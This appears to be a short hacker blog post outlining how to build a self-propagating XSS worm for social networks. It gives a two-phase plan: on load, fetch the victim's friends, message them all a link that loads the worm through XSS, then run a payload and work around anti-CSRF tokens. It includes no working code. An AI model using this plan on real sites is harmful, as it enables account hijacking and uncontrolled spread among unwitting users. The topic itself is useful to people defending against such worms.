JS Judo + XSS + CSRF = Pwnage

…an excellent breeding environment for an XSS worm…

What is an XSS worm?
Wikipedia

An XSS Worm, also known as a cross site scripting virus[1], is a malicious (or sometimes non-malicious) payload that propagates among visitors of a website in the attempt to progressively infect other visitors.

Sticking to KIS (keep it simple) standards it’s a piece of code that propagates…

JS Judo?
Reuse of JS code… JS Judo – JS Judo II…. targets for JS Judoing would be frameworks like Dojo, Prototype, Jquery, mooTools, etc…

XSS?
If you don’t know what xss is, you’re in the wrong place now…

CSRF?
Same as above… wrote a couple of articles about it somewhere around here…

Gluing the pieces together+
Getting the idea and all (as a startup article) Launching XSS CSRF Based Worms On Social Networks… Also Writing A Modular Universal XSS Worm may sound interesting… but if you’re the same as me making the code propagate and have a payload it’s more than enough…

KIS?
Keeping it simple… here is what the worm should do…
—
:phase 1
after load -> get list with friends
message them (all) a link that loads (via XSS) the worm
:phase 2
payload
—
in theory it’s very simple, but in when coding the code it’s essential to understand the site structure (to know what requests to make, and how to parse them)… also some times you’ll have to grab the anti csrf token… good luck… =)